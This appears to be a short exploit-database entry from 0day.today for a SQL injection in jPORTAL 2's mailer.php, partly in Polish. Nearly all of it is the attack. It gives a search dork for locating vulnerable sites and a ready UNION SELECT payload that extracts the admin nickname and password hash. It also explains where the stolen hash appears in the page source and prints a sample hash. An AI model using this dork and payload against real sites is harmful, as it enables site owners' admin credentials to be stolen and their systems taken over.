[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

jPORTAL 2 mailer.php Remote SQL Injection Vulnerability

Author
Kacper
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2275
Category
web applications
Date add
06-11-2007
Platform
unsorted
=======================================================
jPORTAL 2 mailer.php Remote SQL Injection Vulnerability
=======================================================




Tytul: jPORTAL 2 Remote SQL Injection Vulnerability
dork:[ intext:"jPORTAL 2" & inurl:"mailer.php" ]

Autor: Kacper

Blad:

mailer.php?to=999999999999'+union+select+0,1,2,3,4,5,concat(nick,char(58),pass),7+from+admins+limit+1/*

po wykonaniu zapytania wystarczy zajrzec w xrodlo strony i poszukac:

<input type="hidden" name="cmd" value="sendmail"><input type="hidden" name="to" value="admin:9b3a80a898fabc984e733d904027cc91"></td>

value="admin:9b3a80a898fabc984e733d904027cc91" < ----/  to Twoj rezultat wykonania zapytania SQL.

be safe all  :) 



#  0day.today [2024-11-15]  #